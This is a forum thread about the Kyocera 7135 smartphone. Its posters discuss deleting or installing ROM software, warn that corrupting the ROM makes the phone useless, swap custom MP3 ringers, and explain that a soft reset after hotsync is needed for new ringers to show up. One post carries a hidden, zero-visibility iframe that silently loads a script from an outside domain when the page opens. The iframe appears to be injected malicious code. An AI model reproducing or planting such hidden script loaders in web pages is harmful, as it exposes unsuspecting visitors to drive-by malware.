Otter (or anyone!), ROM software and what ringers you got??

Hey Otter

I found I much prefer Xiino web browser over Eudora and EIS on the 7135. Here's my question... how can you delete Eudora and EIS from ROM, and how can you install to ROM new software like Xiino?

Also I know you've had a 7135 since last September so you probably have really customized your phone. Want to ask what MP3 ringers have you installed - and can you share them with us??

Thanks! <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

FYI there ARE some Palm utilities which allow you to write directly to ROM.

BUT ... I DO NOT recommend doing so on a 7135.

Reason: if the ***ROM*** gets corrupted, then the 7135 willl be COMPLETELY USELESS. NOT EVEN Kyocera can fix it.

FYI one thing I mentioned in an earlier post is that with the new firmware (SZ1.0.29), Kyocera added some "safeguards" to stop apps from writing to ROM. BECAUSE ... corrupted ROM images result in a useless piece of metal!

About my ringers .....

Yeah, I'll admit I've spent A LOT of time in creating MP3 ringers and alerts!

For my Date Book alarm, I used the classic Ricky Ricardo quote -- "The time has come!"

For my Todo alert, the classic Yul Brynner MP3: "So let it be written ... so let it be done!"

As far as MP3 incoming ringers ...

I have two national anthems: "God Save the Queen" ... and the Soviet National Anthem.

I also have TWO different MP3s of the Aflac duck!

Finally, I have two VERY PERSONAL ringers of Katharine Hepburn. The one I use for my girlfriend is Kate saying "It's ME, you old POOP!". The other is from a Kate cartoon of Little Bo Peep, where she says "I'm Little Bo Peep ... I've lost my sheep -- RRRRREALLY I have."

I WILL NOT share the Kate ringers; but if you like any of the other, PM me with your email address and I'll send it / them to you!

Hey Otter, this might sound like a dumb question but how do you hotsync the ringer and other files I make on my computer, i.e. how do I get them to the phone and in the right spot so I can choose them in the phone prefs. An ordinary hotsync doesn't seem to work. thanks.

After you hotsync, you have to do a soft reset. Then the ringer you made will appear with all the other standard ringers in the phone prefs.
